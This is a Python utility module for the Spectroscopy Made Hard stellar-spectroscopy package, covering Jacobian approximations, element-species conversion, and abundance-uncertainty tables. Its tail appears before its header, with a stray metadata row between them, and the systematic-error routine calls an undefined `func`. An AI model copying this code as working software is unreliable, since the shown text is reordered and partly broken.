        [ 4.2613e-08*teff - 4.2039e-04, -5.7948e-02*logg - 1.2402e-01, -4.3985e-01*vt + 8.0592e-02, -1.1533e-01*feh - 9.2341e-02],
        [-3.2710e-08*teff + 2.8178e-04, -1.2006e-02*logg - 3.5816e-03, 3.8185e-03*vt - 1.6601e-02, -2.8592e-05*feh + 1.4257e-03],
        [-1.7822e-08*teff + 1.8250e-04, -1.2114e-02*logg + 4.1779e-02, 3.5564e-02*vt - 1.1024e-01, -1.8847e-02*feh - 1.0949e-01]
    ])
    return full_jacobian.T
def approximate_sun_hermes_jacobian_2(stellar_parameters, *args):
    """
    Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations using the Sun
    and the HERMES atomic line list, after equivalent widths
    were carefully inspected.

    Variant of `approximate_sun_hermes_jacobian` whose parameter vector
    is ordered (teff, logg, vt, feh); the matrix columns are permuted
    accordingly.
    """

    # logger.info("Updated approximation of the Jacobian")

    teff, logg, vt, feh = stellar_parameters[:4]

    # full_jacobian = np.array([
    # [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
    # [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
    # [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
    # [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
    # ])

    # After culling abundance outliers,..
    full_jacobian = np.array([
        [ 4.5143e-08*teff - 4.3018e-04, 1.7168e-02*logg - 5.3255e-02, -6.4264e-04*vt + 2.4581e-02, 1.1205e-02*feh - 7.3342e-03],
        [-1.0055e-07*teff + 7.5583e-04, -6.7963e-02*logg + 7.3189e-02, 5.0811e-02*vt - 3.1919e-01, -4.1335e-02*feh - 6.0225e-02],
        [-1.9097e-08*teff + 1.8040e-04, -6.4754e-03*logg - 2.0095e-02, -3.8736e-03*vt + 7.6987e-03, -4.1837e-03*feh - 4.1084e-03],
        [-7.3958e-09*teff + 1.0175e-04, -9.7692e-03*logg + 3.2322e-02, 6.5783e-03*vt - 3.6509e-02, -1.7391e-02*feh - 1.0502e-01]
    ])
    return full_jacobian.T
def element_to_species(element_repr):
    """ Converts a string representation of an element and its ionization state
    to a floating point (e.g. "Fe II" -> 26.1; molecule names map through
    `common_molecule_name2species`). """

    if not isinstance(element_repr, string_types):
        raise TypeError("element must be represented by a string-type")

    # Split off the ionization stage, defaulting to neutral ("I").
    if element_repr.count(" ") > 0:
        element, ionization = element_repr.split()[:2]
    else:
        element, ionization = element_repr, "I"

    if element not in periodic_table:
        try:
            return common_molecule_name2species[element]
        except KeyError:
            # Unrecognised symbol: assume the string is already numeric.
            return float(element_repr)

    # "I" -> +0.0, "II" -> +0.1, "III" -> +0.2, ...
    stage = max([0, ionization.upper().count("I") - 1]) / 10.
    return periodic_table.index(element) + 1 + stage
def element_to_atomic_number(element_repr):
    """
    Converts a string representation of an element (optionally with an
    ionization state, which is ignored) to its atomic number.

    :param element_repr:
        A string representation of the element. Typical examples might be 'Fe',
        'Ti I', 'si'.

    :raises ValueError:
        If the element is neither in the periodic table nor in the common
        molecule table.
    """

    if not isinstance(element_repr, string_types):
        raise TypeError("element must be represented by a string-type")

    element = element_repr.title().strip().split()[0]
    try:
        index = periodic_table.index(element)
    except ValueError:
        # `list.index` raises ValueError on a miss (the original also caught
        # IndexError, which .index can never raise — dead branch removed).
        # Fall back to the common molecule table before giving up.
        try:
            return common_molecule_name2Z[element]
        except KeyError:
            raise ValueError("unrecognized element '{}'".format(element_repr))

    return 1 + index
def species_to_element(species):
    """ Converts a floating point representation of a species to a string
    representation of the element and its ionization state """

    if not isinstance(species, (float, int)):
        raise TypeError("species must be represented by a floating point-type")

    if round(species, 1) != species:
        # Then you have isotopes, but we will ignore that
        species = int(species * 10) / 10.

    # Valid atomic numbers run from 1 to len(periodic_table); the original
    # test (`species + 1 >= len(periodic_table)`) wrongly routed the last
    # two elements (Lr, Rf) down the molecule path.
    if species > len(periodic_table) or 1 > species:
        # Don"t know what this element is. It"s probably a molecule.
        try:
            elems = common_molecule_species2elems[species]
            return "-".join(elems)
        except KeyError:
            # No idea
            return str(species)

    element = periodic_table[int(species) - 1]
    ionization = int(round(10 * (species - int(species)) + 1))

    # The special cases
    if element in ("C", "H", "He"):
        return element
    return "%s %s" % (element, "I" * ionization)
def extend_limits(values, fraction=0.10, tolerance=1e-2):
    """ Extend the range spanned by `values` by `fraction` on each side,
    ignoring non-finite entries. Raises ValueError if nothing is finite. """

    values = np.array(values)
    finite = np.isfinite(values)
    if np.sum(finite) == 0:
        raise ValueError("no finite values provided")

    lower = np.min(values[finite])
    upper = np.max(values[finite])
    spread = np.ptp([lower, upper])
    limits = (lower - fraction * spread, upper + fraction * spread)

    # Degenerate range (all values effectively equal): pad by a fraction
    # of the value itself, or by 1 when the value is itself ~zero.
    if np.abs(limits[0] - limits[1]) < tolerance:
        if np.abs(limits[0]) < tolerance:
            offset = 1
        else:
            offset = np.abs(limits[0]) * fraction
        limits = (limits[0] - offset, limits[0] + offset)

    return np.array(limits)
def get_version():
    """ Retrieves the version of Spectroscopy Made Hard based on the
    git version """

    # Without git on the PATH we cannot determine a revision.
    if getstatusoutput("which git")[0] != 0:
        return "Unknown"

    commands = (
        "git rev-parse --abbrev-ref HEAD",       # current branch name
        "git log --pretty=format:'%h' -n 1",     # short hash of HEAD
    )
    outputs = [getstatusoutput(command)[1] for command in commands]
    return "0.1dev:" + ":".join(outputs)
def struct2array(x):
    """ Convert numpy structured array of simple type to normal numpy array
    (one column per field; all fields must share one dtype). """
    num_fields = len(x.dtype)
    field_type = x.dtype[0].type
    # A flat view is only meaningful when every field has the same dtype.
    assert np.all([x.dtype[i].type == field_type for i in range(num_fields)])
    return x.view(field_type).reshape((-1, num_fields))
def process_session_uncertainties_lines(session, rhomat, minerr=0.001):
    """
    Build a per-line abundance table with statistical and systematic errors,
    using Sergey's estimator for the per-species systematic scatter term.

    :param session:
        An SMHR session whose `spectral_models` have been fitted.

    :param rhomat:
        A (4, 4) correlation matrix between the stellar parameter errors;
        it is applied to (e_Teff, e_logg, e_vt, e_MH) vectors below —
        TODO confirm that ordering against the caller.

    :param minerr:
        Error floor added in quadrature to each line's statistical error.

    :returns:
        An `astropy.table.Table` with one row per acceptable, non-upper-limit
        spectral model, including per-line errors, the per-species systematic
        error `e_sys`, total error `e_tot`, and inverse-covariance weights.
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    from .photospheres.abundances import asplund_2009 as solar_composition
    cols = ["index","wavelength","species","expot","loggf",
            "logeps","e_stat","eqw","e_eqw","fwhm",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_tot","weight"]
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for i, model in enumerate(session.spectral_models):
        # Only acceptable detections contribute; upper limits are skipped.
        if not model.is_acceptable: continue
        if model.is_upper_limit: continue
        wavelength = model.wavelength
        species = np.ravel(model.species)[0]
        expot = model.expot
        loggf = model.loggf
        if np.isnan(expot) or np.isnan(loggf):
            print(i, species, model.expot, model.loggf)
        try:
            logeps = model.abundances[0]
            staterr = model.metadata["1_sigma_abundance_error"]
            if isinstance(model, SpectralSynthesisModel):
                # For syntheses, take the larger of the stored error and the
                # abundance variance from the fit covariance (when finite).
                (named_p_opt, cov, meta) = model.metadata["fitted_result"]
                if np.isfinite(cov[0,0]**0.5):
                    staterr = max(staterr, cov[0,0]**0.5)
            assert ~np.isnan(staterr)
            # apply minimum
            staterr = np.sqrt(staterr**2 + minerr**2)
            sperrdict = model.metadata["systematic_stellar_parameter_abundance_error"]
            e_Teff = sperrdict["effective_temperature"]
            e_logg = sperrdict["surface_gravity"]
            e_vt = sperrdict["microturbulence"]
            e_MH = sperrdict["metallicity"]
            # Quadratic form with the SP error correlation matrix.
            e_all = np.array([e_Teff, e_logg, e_vt, e_MH])
            syserr_sq = e_all.T.dot(rhomat.dot(e_all))
            syserr = np.sqrt(syserr_sq)
            fwhm = model.fwhm
        except Exception as e:
            # Best-effort: a broken model becomes a row of NaNs rather than
            # aborting the whole table.
            print("ERROR!!!")
            print(i, species, model.wavelength)
            print("Exception:",e)
            logeps, staterr, e_Teff, e_logg, e_vt, e_MH, syserr = np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan
        if isinstance(model, ProfileFittingModel):
            eqw = model.equivalent_width or np.nan
            e_eqw = model.equivalent_width_uncertainty or np.nan
        else:
            # Sentinel for synthesis models, which have no equivalent width.
            eqw = -999
            e_eqw = -999
        #toterr = np.sqrt(staterr**2 + syserr**2)
        input_data = [i, wavelength, species, expot, loggf,
                      logeps, staterr, eqw, e_eqw, fwhm,
                      e_Teff, e_logg, e_vt, e_MH, syserr,
                      np.nan, np.nan]
        for col, x in zip(cols, input_data):
            data[col].append(x)
    tab = astropy.table.Table(data)
    # Calculate systematic error and effective weights for each species
    tab["e_sys"] = np.nan
    for species in np.unique(tab["species"]):
        ix = np.where(tab["species"]==species)[0]
        t = tab[ix]
        # Estimate systematic error s by fixed-point iteration: recompute
        # weights from the full covariance at the current s, then re-solve.
        s = s_old = 0.
        s_max = 2.
        delta = struct2array(t["e_Teff","e_logg","e_vt","e_MH"].as_array())
        ex = t["e_stat"]
        for i in range(35):
            sigma_tilde = np.diag(s**2 + ex**2) + (delta.dot(rhomat.dot(delta.T)))
            sigma_tilde_inv = np.linalg.inv(sigma_tilde)
            w = np.sum(sigma_tilde_inv, axis=1)
            xhat = np.sum(w*t["logeps"])/np.sum(w)
            dx = t["logeps"] - xhat
            # NOTE(review): `func` is not defined anywhere in this view of
            # the file — presumably a closure over (dx, ex, delta, rhomat)
            # whose root in s gives the systematic scatter. Confirm its
            # definition exists upstream before relying on this routine.
            if func(0) < func(s_max):
                s = 0
                break
            s = optimize.brentq(func, 0, s_max, xtol=.001)
            if np.abs(s_old - s) < 0.01:
                break
            s_old = s
        else:
            print(species,"s did not converge!")
        print("Final in {} iter: {:.1f} {:.3f}".format(i+1, species, s))
        tab["e_sys"][ix] = s
        tab["e_tot"][ix] = np.sqrt(s**2 + ex**2)
        sigma_tilde = np.diag(tab["e_tot"][ix]**2) + (delta.dot(rhomat.dot(delta.T)))
        sigma_tilde_inv = np.linalg.inv(sigma_tilde)
        w = np.sum(sigma_tilde_inv, axis=1)
        wb = np.sum(sigma_tilde_inv, axis=0)
        # Sanity check: the inverse covariance is symmetric, so row and
        # column sums must agree.
        assert np.allclose(w,wb,rtol=1e-6), "Problem in species {:.1f}, Nline={}, e_sys={:.2f}".format(species, len(t), s)
        tab["weight"][ix] = w
    for col in tab.colnames:
        if col in ["index", "wavelength", "species", "loggf", "star"]: continue
        tab[col].format = ".3f"
    return tab
def process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY):
    """
    Computes the following
    Var([X/Fe]) = Var(X) + Var(Fe) - 2 Cov(X, Fe)
    Does *not* compute covariances, but you can do that this way:
    Cov([X/Fe], [Fe/H]) = Cov(X,Fe) - Cov(Fe, Fe)

    Returns (feh1, exfe1, feh2, exfe2) for Fe I (species 26.0) and
    Fe II (species 26.1), falling back to NaN / the Fe I values when a
    species is missing from `summary_tab`.
    """
    species_col = summary_tab["species"]

    # [X/Fe] errors come from the Fe I / Fe II parts of the covariance.
    fe1_rows = np.where(species_col == 26.0)[0]
    if len(fe1_rows) == 0:
        print("No feh1: setting to nan")
        ix1 = None
        feh1 = np.nan
        exfe1 = np.nan
    else:
        ix1 = fe1_rows[0]
        feh1 = summary_tab["[X/H]"][ix1]
        # Var(X/Fe1) = Var(X) + Var(Fe1) - 2*Cov(X,Fe1)
        exfe1 = np.sqrt(var_X + var_X[ix1] - 2 * cov_XY[ix1, :])

    fe2_rows = np.where(species_col == 26.1)[0]
    if len(fe2_rows) == 0:
        print("No feh2: setting to feh1")
        feh2 = feh1
        # Without Fe II, fall back to the Fe I variance (scalar), or NaN
        # when Fe I was missing as well.
        exfe2 = np.nan if ix1 is None else np.sqrt(var_X[ix1])
    else:
        ix2 = fe2_rows[0]
        feh2 = summary_tab["[X/H]"][ix2]
        # Var(X/Fe2) = Var(X) + Var(Fe2) - 2*Cov(X,Fe2)
        exfe2 = np.sqrt(var_X + var_X[ix2] - 2 * cov_XY[ix2, :])

    return feh1, exfe1, feh2, exfe2
def process_session_uncertainties_abundancesummary(tab, rhomat):
    """
    Take a table of lines and turn them into standard abundance table

    For every unique species in `tab`, compute straight and weighted
    abundance statistics, the (weighted) abundance response to each stellar
    parameter, the combined stellar-parameter error (through `rhomat`),
    [X/H], and finally [X/Fe] relative to Fe I and Fe II.
    Returns an astropy Table with one row per species.
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    from .photospheres.abundances import asplund_2009 as solar_composition
    unique_species = np.unique(tab["species"])
    cols = ["species","elem","N",
            "logeps","sigma","stderr",
            "logeps_w","sigma_w","stderr_w",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
            "[X/H]","e_XH","s_X"]
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for species in unique_species:
        ttab = tab[tab["species"]==species]
        elem = species_to_element(species)
        N = len(ttab)
        # Unweighted statistics over all lines of this species.
        logeps = np.mean(ttab["logeps"])
        stdev = np.std(ttab["logeps"])
        stderr = stdev/np.sqrt(N)
        # Weighted statistics using the per-line weights computed during
        # the systematic-error estimation.
        w = ttab["weight"]
        finite = np.isfinite(w)
        if finite.sum() != N:
            print("WARNING: species {:.1f} N={} != finite weights {}".format(species, N, finite.sum()))
        x = ttab["logeps"]
        logeps_w = np.sum(w*x)/np.sum(w)
        stdev_w = np.sqrt(np.sum(w*(x-logeps_w)**2)/np.sum(w))
        stderr_w = np.sqrt(1/np.sum(w))
        # Mean (and weighted-mean) abundance response to perturbing each
        # stellar parameter.
        sperrs = []
        sperrs_w = []
        for spcol in ["Teff","logg","vt","MH"]:
            x_new = x + ttab["e_"+spcol]
            e_sp = np.mean(x_new) - logeps
            sperrs.append(e_sp)
            #e_sp_w = np.sum(w*x_new)/np.sum(w) - logeps_w
            e_sp_w = np.sum(w*ttab["e_"+spcol])/np.sum(w)
            sperrs_w.append(e_sp_w)
        sperrs = np.array(sperrs)
        sperrs_w = np.array(sperrs_w)
        # Combine the four responses through the correlation matrix.
        sperrtot = np.sqrt(sperrs.T.dot(rhomat.dot(sperrs)))
        sperrtot_w = np.sqrt(sperrs_w.T.dot(rhomat.dot(sperrs_w)))
        XH = logeps_w - solar_composition(species)
        #e_XH = np.sqrt(stderr_w**2 + sperrtot_w**2)
        e_XH = stderr_w
        # e_sys is constant within a species by construction; keep one copy.
        s_X = ttab["e_sys"][0]
        assert np.allclose(ttab["e_sys"], s_X), s_X
        input_data = [species, elem, N,
                      logeps, stdev, stderr,
                      logeps_w, stdev_w, stderr_w,
                      sperrs[0], sperrs[1], sperrs[2], sperrs[3], sperrtot,
                      sperrs_w[0], sperrs_w[1], sperrs_w[2], sperrs_w[3], sperrtot_w,
                      XH, e_XH, s_X
                      ]
        assert len(cols) == len(input_data)
        for col, x in zip(cols, input_data):
            data[col].append(x)
    summary_tab = astropy.table.Table(data)
    ## Add in [X/Fe]
    var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
    feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
    if len(summary_tab["[X/H]"]) > 0:
        summary_tab["[X/Fe1]"] = summary_tab["[X/H]"] - feh1
        summary_tab["e_XFe1"] = efe1
        summary_tab["[X/Fe2]"] = summary_tab["[X/H]"] - feh2
        summary_tab["e_XFe2"] = efe2
        # Species with a fractional part (e.g. 26.1) are ionized: reference
        # them to Fe II; neutrals are referenced to Fe I.
        ixion = np.array([x - int(x) > .01 for x in summary_tab["species"]])
        summary_tab["[X/Fe]"] = summary_tab["[X/Fe1]"]
        summary_tab["e_XFe"] = summary_tab["e_XFe1"]
        summary_tab["[X/Fe]"][ixion] = summary_tab["[X/Fe2]"][ixion]
        summary_tab["e_XFe"][ixion] = summary_tab["e_XFe2"][ixion]
        for col in summary_tab.colnames:
            if col=="N" or col=="species" or col=="elem": continue
            summary_tab[col].format = ".3f"
    else:
        # Empty table: still add the [X/Fe] columns so downstream code can
        # rely on their presence.
        for col in ["[X/Fe]","[X/Fe1]","[X/Fe2]",
                    "e_XFe","e_XFe1","e_XFe2"]:
            summary_tab.add_column(astropy.table.Column(np.zeros(0),col))
        #summary_tab[col] = np.nan #.add_column(col)
    return summary_tab
def process_session_uncertainties(session,
        rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
    """
    Build the final line table and per-species abundance summary (with
    uncertainties) for a session on which
    session.compute_all_abundance_uncertainties() has already been run.

    The rho_XY keywords are correlation coefficients between the stellar
    parameters, (X, Y) in [T, g, v, M]; all default to zero, i.e. no
    correlated error is included.

    Returns (line_table, summary_table).
    """
    ## Correlation matrix for [T, g, v, M]; it is scaled by the individual
    ## parameter errors downstream to form covariance matrices.
    rhomat = _make_rhomat(rho_Tg, rho_Tv, rho_TM, rho_gv, rho_gM, rho_vM)
    ## Per-line measurement table (upper limits are excluded at this stage).
    line_tab = process_session_uncertainties_lines(session, rhomat)
    ## Collapse the line measurements into one row per species.
    summary = process_session_uncertainties_abundancesummary(line_tab, rhomat)
    ## Fold the upper limits into both tables and return them.
    return process_session_uncertainties_limits(session, line_tab, summary, rhomat)
def get_synth_eqw(model, window=1.0, wavelength=None,
                  get_spec=False):
    """
    Calculate the equivalent width associated with the synthetic line.
    This is done by synthesizing the line in absence of any other elements,
    then integrating the synthetic spectrum in a window around the central wavelength.
    The user can specify the size of the window (default +/-1A)
    and the central wavelength (default None -> model.wavelength)

    Returns (eqw, eqw_all, blank_eqw, blank_eqw_all) in milliangstroms:
    the windowed and full-range equivalent widths of the single-element
    synthesis and of a "blank" synthesis with every abundance set to -9.
    When get_spec is True, also returns (synth_dispersion, intensities).
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    assert isinstance(model, SpectralSynthesisModel)
    assert len(model.elements)==1, model.elements
    # Blank out every element except the one being measured.
    abundances = model.metadata["rt_abundances"].copy()
    for key in abundances:
        if key != model.elements[0]: abundances[key] = -9.0
    # BUGFIX: dict.values() is a non-indexable view on Python 3; wrap it in
    # list() before taking the first (fitted abundance) entry.
    abundances[model.elements[0]] = list(model.metadata["fitted_result"][0].values())[0]
    print(abundances)
    synth_dispersion, intensities, meta = model.session.rt.synthesize(
        model.session.stellar_photosphere, model.transitions,
        abundances,
        isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
    if wavelength is None: wavelength = model.wavelength
    ii = (synth_dispersion > wavelength - window) & (synth_dispersion < wavelength + window)
    # integrate with the trapezoid rule, get milliangstroms
    eqw = 1000.*integrate.trapz(1.0-intensities[ii], synth_dispersion[ii])
    # integrate everything with the trapezoid rule, get milliangstroms
    eqw_all = 1000.*integrate.trapz(1.0-intensities, synth_dispersion)
    # Resynthesize with everything blanked to measure the residual/blend
    # contribution.
    for key in abundances:
        abundances[key] = -9.0
    blank_dispersion, blank_flux, blank_meta = model.session.rt.synthesize(
        model.session.stellar_photosphere, model.transitions,
        abundances,
        isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
    # NOTE(review): the window mask `ii` from the first synthesis is reused
    # here, which assumes both syntheses share the same dispersion grid.
    blank_eqw = 1000.*integrate.trapz(1.0-blank_flux[ii], blank_dispersion[ii])
    # integrate everything with the trapezoid rule, get milliangstroms
    blank_eqw_all = 1000.*integrate.trapz(1.0-blank_flux, blank_dispersion)
    if get_spec:
        return eqw, eqw_all, blank_eqw, blank_eqw_all, synth_dispersion, intensities
    return eqw, eqw_all, blank_eqw, blank_eqw_all
| 39.978282 | 133 | 0.593486 | # coding: utf-8
""" Utility functions for Spectroscopy Made Hard """
__author__ = "Andy Casey <andy@astrowizici.st>"
# Standard library
import os
import logging
import platform
import string
import sys
import traceback
import tempfile
from six import string_types
from collections import Counter, OrderedDict
try:
from subprocess import getstatusoutput
except ImportError: # python 2
from commands import getstatusoutput
from hashlib import sha1 as sha
from random import choice
from socket import gethostname, gethostbyname
# Third party imports
import numpy as np
import astropy.table
from scipy import stats, integrate, optimize
# Molecule name -> atomic number used to represent the molecule when a
# single Z is needed.  NOTE(review): the representative atom varies by
# molecule (e.g. C-N maps to N while Ti-O maps to Ti) -- confirm intent.
common_molecule_name2Z = {
    'Mg-H': 12,'H-Mg': 12,
    'C-C': 6,
    'C-N': 7, 'N-C': 7, #TODO
    'C-H': 6, 'H-C': 6,
    'O-H': 8, 'H-O': 8,
    'Fe-H': 26,'H-Fe': 26,
    'N-H': 7, 'H-N': 7,
    'Si-H': 14,'H-Si': 14,
    'Ti-O': 22,'O-Ti': 22,
    'V-O': 23,'O-V': 23,
    'Zr-O': 40,'O-Zr': 40
    }
# Molecule name -> numeric species code (the two atomic numbers
# concatenated, lighter element first; cf. elems_isotopes_ion_to_species).
common_molecule_name2species = {
    'Mg-H': 112,'H-Mg': 112,
    'C-C': 606,
    'C-N': 607,'N-C': 607,
    'C-H': 106,'H-C': 106,
    'O-H': 108,'H-O': 108,
    'Fe-H': 126,'H-Fe': 126,
    'N-H': 107,'H-N': 107,
    'Si-H': 114,'H-Si': 114,
    'Ti-O': 822,'O-Ti': 822,
    'V-O': 823,'O-V': 823,
    'Zr-O': 840,'O-Zr': 840
    }
# Numeric molecular species code -> the pair of element symbols.
common_molecule_species2elems = {
    112: ["Mg", "H"],
    606: ["C", "C"],
    607: ["C", "N"],
    106: ["C", "H"],
    108: ["O", "H"],
    126: ["Fe", "H"],
    107: ["N", "H"],
    114: ["Si", "H"],
    822: ["Ti", "O"],
    823: ["V", "O"],
    840: ["Zr", "O"]
}
# Public names exported by "from smh.utils import *".
__all__ = ["element_to_species", "element_to_atomic_number", "species_to_element", "get_common_letters", \
    "elems_isotopes_ion_to_species", "species_to_elems_isotopes_ion", \
    "find_common_start", "extend_limits", "get_version", \
    "approximate_stellar_jacobian", "approximate_sun_hermes_jacobian",\
    "hashed_id"]
# Module-level logger shared by all functions below.
logger = logging.getLogger(__name__)
def mkdtemp(**kwargs):
    """
    Wrapper around tempfile.mkdtemp that defaults the temporary directory
    location to ~/.smh (created on demand).

    Any tempfile.mkdtemp keyword (prefix, suffix, dir, ...) is passed
    through; an explicit 'dir' overrides the ~/.smh default.
    Returns the path of the new temporary directory.
    """
    # expanduser is more portable than os.environ["HOME"], which is unset
    # on Windows and would raise a KeyError there.
    smh_dir = os.path.join(os.path.expanduser("~"), ".smh")
    if not os.path.exists(smh_dir):
        logger.info("Making " + smh_dir)
        try:
            os.mkdir(smh_dir)
        except OSError:
            # Another process may have created it between the existence
            # check and the mkdir; only re-raise if it is still missing.
            if not os.path.isdir(smh_dir):
                raise
    kwargs.setdefault('dir', smh_dir)
    return tempfile.mkdtemp(**kwargs)
def mkstemp(**kwargs):
    """
    Wrapper around tempfile.mkstemp that defaults the temporary file
    location to ~/.smh (created on demand).

    Any tempfile.mkstemp keyword is passed through; an explicit 'dir'
    overrides the ~/.smh default.  Returns (os-level handle, path), as
    tempfile.mkstemp does.
    """
    # expanduser is more portable than os.environ["HOME"], which is unset
    # on Windows and would raise a KeyError there.
    smh_dir = os.path.join(os.path.expanduser("~"), ".smh")
    if not os.path.exists(smh_dir):
        logger.info("Making " + smh_dir)
        try:
            os.mkdir(smh_dir)
        except OSError:
            # Lost a creation race with another process; ignore if the
            # directory now exists.
            if not os.path.isdir(smh_dir):
                raise
    kwargs.setdefault('dir', smh_dir)
    return tempfile.mkstemp(**kwargs)
def random_string(N=10):
    """Return a random string of N uppercase ASCII letters and digits."""
    alphabet = string.ascii_uppercase + string.digits
    picks = [choice(alphabet) for _ in range(N)]
    return ''.join(picks)
def equilibrium_state(transitions, columns=("expot", "rew"), group_by="species",
    ycolumn="abundance", yerr_column=None):
    """
    Perform linear fits to the abundances provided in the transitions table
    with respect to x-columns.

    :param transitions:
        A table of atomic transitions with measured equivalent widths and
        abundances.

    :param columns: [optional]
        The names of the columns to make fits against.

    :param group_by: [optional]
        The name of the column in `transitions` to calculate states.

    :param ycolumn: [optional]
        The name of the column containing the fitted quantity
        (defaults to "abundance").

    :param yerr_column: [optional]
        The name of the column containing uncertainties on `ycolumn`.
        Missing columns fall back to unit errors.

    :returns:
        A dict keyed by each group's `group_by` value, mapping to a dict of
        per-x-column tuples (m, b, median(y), (std(y), std(m)), N).
    """
    lines = {}
    transitions = transitions.group_by(group_by)
    # groups.indices brackets each group: [start_i, start_{i+1}) are rows.
    for i, start_index in enumerate(transitions.groups.indices[:-1]):
        end_index = transitions.groups.indices[i + 1]
        # Fit y against each requested x-column within this group.
        group_lines = {}
        for x_column in columns:
            x = transitions[x_column][start_index:end_index]
            # BUGFIX: previously hard-coded "abundance" here, silently
            # ignoring the ycolumn argument.
            y = transitions[ycolumn][start_index:end_index]
            if yerr_column is not None:
                try:
                    yerr = transitions[yerr_column][start_index:end_index]
                except KeyError:
                    logger.exception("Cannot find yerr column '{}':".format(
                        yerr_column))
                    yerr = np.ones(len(y))
            else:
                yerr = np.ones(len(y))
            # Only use finite values.
            finite = np.isfinite(x * y * yerr)
            try: # fix for masked arrays
                finite = finite.filled(False)
            except AttributeError:
                # Plain ndarrays have no .filled(); nothing to do.
                pass
            if not np.any(finite):
                continue
            # NOTE(review): yerr is not propagated into the fit because
            # fit_line does not support error bars yet.
            m, b, medy, stdy, stdm, N = fit_line(x, y, None)
            group_lines[x_column] = (m, b, medy, (stdy, stdm), N)
        identifier = transitions[group_by][start_index]
        if group_lines:
            lines[identifier] = group_lines
    return lines
def fit_line(x, y, yerr=None):
    """
    Least-squares straight-line fit y = m*x + b over the finite (x, y)
    pairs.  The fit is done on mean-centered x (decorrelating slope and
    intercept) and the intercept is shifted back afterwards.

    Returns (m, b, median(y), std(y), stderr(m), Npoints); all-NaN with
    Npoints = 0 when there are no finite pairs.  yerr is not supported.
    """
    if yerr is not None:
        raise NotImplementedError("Does not fit with error bars yet")
    good = np.isfinite(x) & np.isfinite(y)
    if good.sum() == 0:
        return np.nan, np.nan, np.nan, np.nan, np.nan, 0
    xg, yg = x[good], y[good]
    center = np.mean(xg)
    slope, b_centered, _r, _p, slope_err = stats.linregress(xg - center, yg)
    # Undo the centering: y = m*(x - c) + b_c  =>  intercept = b_c - m*c.
    intercept = b_centered - slope * center
    return slope, intercept, np.median(yg), np.std(yg), slope_err, len(xg)
def spectral_model_conflicts(spectral_models, line_list):
    """
    Identify abundance conflicts in a list of spectral models.

    :param spectral_models:
        A list of spectral models to check for conflicts.

    :param line_list:
        A table of energy transitions.

    :returns:
        A list containing tuples of spectral model indices where there is a
        conflict about which spectral model to use for the determination of
        stellar parameters and/or composition.
    """
    line_list_hashes = line_list.compute_hashes()
    # Map each transition hash -> indices of spectral models that use it.
    transition_hashes = {}
    for i, spectral_model in enumerate(spectral_models):
        for transition in spectral_model.transitions:
            transition_hash = line_list.hash(transition)
            transition_hashes.setdefault(transition_hash, [])
            transition_hashes[transition_hash].append(i)
    # Which of the transition_hashes appear more than once?
    conflicts = []
    # BUGFIX: .items() replaces the Python 2-only .iteritems(), so this
    # also runs on Python 3.
    for transition_hash, indices in transition_hashes.items():
        if len(indices) < 2: continue
        # OK, what element is this transition?
        match = (line_list_hashes == transition_hash)
        element = line_list["element"][match][0].split()[0]
        # Of the spectral models that use this spectral hash, what are they
        # measuring?
        conflict_indices = []
        for index in indices:
            if element not in spectral_models[index].metadata["elements"]:
                # This transition is not being measured in this spectral model.
                continue
            else:
                # This spectral model is modeling this transition.
                # Does it say this should be used for the determination of
                # stellar parameters or composition?
                if spectral_models[index].use_for_stellar_parameter_inference \
                or spectral_models[index].use_for_stellar_composition_inference:
                    conflict_indices.append(index)
        if len(conflict_indices) > 1:
            conflicts.append(conflict_indices)
    return conflicts
# List the periodic table here so that we can use it outside of a single
# function scope (e.g., 'element in utils.periodic_table')
periodic_table = """H He
Li Be B C N O F Ne
Na Mg Al Si P S Cl Ar
K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn Ga Ge As Se Br Kr
Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe
Cs Ba Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn
Fr Ra Lr Rf"""
lanthanoids = "La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb"
actinoids = "Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No"
# Splice the lanthanoid/actinoid rows in after Ba/Ra, then split into a
# flat list of element symbols ordered so that index + 1 == atomic number.
periodic_table = periodic_table.replace(" Ba ", " Ba " + lanthanoids + " ") \
    .replace(" Ra ", " Ra " + actinoids + " ").split()
# The helper strings are no longer needed once spliced in.
del actinoids, lanthanoids
def hashed_id():
    """
    Return a stable, anonymized identifier for the current user: the SHA-1
    hex digest of the configured git user.name, or of a deterministic UUID
    when the git lookup fails.
    """
    try:
        salt = getstatusoutput("git config --get user.name")[1]
    except Exception:
        # BUGFIX: uuid3() returns a UUID object, which has no .encode();
        # convert it to str before hashing.  Also avoid a bare except.
        import uuid
        salt = str(uuid.uuid3(uuid.NAMESPACE_DNS, ""))
